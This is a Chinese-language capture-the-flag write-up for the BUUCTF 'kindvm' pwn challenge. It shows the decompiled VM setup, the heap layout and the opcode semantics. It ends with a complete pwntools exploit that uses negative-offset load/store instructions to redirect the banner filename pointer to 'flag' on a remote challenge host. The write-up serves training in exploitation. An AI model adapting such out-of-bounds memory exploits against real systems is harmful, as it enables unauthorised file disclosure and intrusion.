[BUUCTF

BUUCTF"/>

[BUUCTF

一直没独自处理过虚拟机的题，今天遇到一个简单的。

主要功能：

void *kindvm_setup()
{int v0; // ebxvoid *result; // eaxkc = (int)malloc(0x18u);*(_DWORD *)kc = 0;*(_DWORD *)(kc + 4) = 0;v0 = kc;*(_DWORD *)(v0 + 8) = input_username();*(_DWORD *)(kc + 12) = "banner.txt";*(_DWORD *)(kc + 16) = func_greeting;*(_DWORD *)(kc + 20) = func_farewell;mem = malloc(0x400u);memset(mem, 0, 0x400u);reg = malloc(0x20u);memset(reg, 0, 0x20u);insn = malloc(0x400u);result = memset(mem, 65, 0x400u);func_table[0] = (int)insn_nop;dword_804B0C4 = (int)insn_load;dword_804B0C8 = (int)insn_store;dword_804B0CC = (int)insn_mov;dword_804B0D0 = (int)insn_add;dword_804B0D4 = (int)insn_sub;dword_804B0D8 = (int)insn_halt;dword_804B0DC = (int)insn_in;dword_804B0E0 = (int)insn_out;dword_804B0E4 = (int)insn_hint;return result;
}

先在堆里建5个块，分别是

1. 管理块，+4退出标记1退出0继续 +8:ptr->name +c:ptr->banner.txt +10:ptr->欢迎 +14:再见。其中欢迎和再见都会打开+c的文件读取并输出
2. name 输入的名字
3. mem 虚拟机的内存区
4. ret 虚拟机的寄存器区8个寄存器
5. 输入命令存储区

基本命令：

1. 0 nop 肯定没用
2. 1 1:reg_id 2:mem_offset 大端  load从mem+mem_offset里读4字节数存入 reg[reg_id]
3. 2 2:mem_offset 1:reg_id  将reg[reg_id]的值存入 mem+mem_offset
4. 6 halt 设置后退出程序

思路就简单了，由于开始结束时都会读一个文件，只要把这个文件（+c位置）改成name（+8 flag）即可。其它功能基本都用不着

完整exp

from pwn import *'''
patchelf --set-interpreter /home/shi/pwn/libc6-i386_2.27-3u1/ld-2.27.so pwn
patchelf --add-needed /home/shi/pwn/libc6-i386_2.27-3u1/libc-2.27.so pwn
'''local = 0
if local == 1:  #localp = process('./pwn')
elif local == 0:           #remotep = remote('node4.buuoj', 27929) libc_elf = ELF('/home/shi/pwn/libc6-i386_2.27-3u1/libc-2.27.so')
one = [0x3cbea,0x3cbec,0x3cbf0,0x3cbf7,0x6729f,0x672a0,0x13573e,0x13573f]
libc_start_main_ret = 0x1eee5    elf = ELF('./pwn')
context(arch = 'i386', log_level='debug')'''
0 nop
1 load  1:reg_id 2: 4:number   mov reg[i], num
2 store 3:mem_id 1:reg_id      mov mem[j], reg[i]
3 mov   1:reg_id i 1:reg_id j  mov reg[i], reg[j]
4 add   1:reg_id i 1:reg_id j  reg[i] += reg[j]
5 sub   1:reg_id i 1:reg_id j  reg[i] -= reg[j]
6 halt 
7 in    1:reg_id 4:number      reg[i] = number
8 out   1:reg_id               printf("%x(%d)", reg[i], reg[i])
9 hint                         hint2.txt20:fun 10:name 410:mem 30:reg 410 insn0x21: +8->name +c->banner.txt +10->greeting +14->farewall
0x804c190:	0x00000000	0x00000000	0x00000000	0x00000021
0x804c1a0:	0x00000000	0x00000000	0x0804c1c0	0x080491b2 <--- 改为0x0804c1c0
0x804c1b0:	0x08048f89	0x08048fba	0x00000000	0x00000011
0x804c1c0:	0x61616161	0x00000000	0x00000000	0x00000411
0x804c1d0:	0x41414141	0x41414141	0x41414141	0x41414141'''#gdb.attach(p, 'b*0x80487ac')
#pause()
p.sendlineafter(b"Input your name : ", b'flag\x00')
payload = b'\x01\x00\xff\xd8'  #load mem[-0x28] -> reg[0]
payload+= b'\x02\xff\xdc\x00'  #store reg[0] -> mem[-0x24]
payload+= b'\x06'              #halt
p.sendlineafter(b'Input instruction : ', payload)p.recv()
p.interactive()

有个小坑，这里16位整形是大端的。